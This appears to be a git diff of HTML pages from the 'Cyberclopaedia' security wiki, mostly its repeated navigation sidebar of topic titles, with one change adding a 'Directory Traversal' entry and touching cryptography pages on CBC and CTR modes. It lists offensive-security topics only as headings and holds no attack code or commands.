      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -196,22 +196,6 @@

Ciphe - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html index b0d5194d..15f4757e 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -204,22 +204,6 @@

IV Reuse Atta - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html index 649cfe15..649f4a6c 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
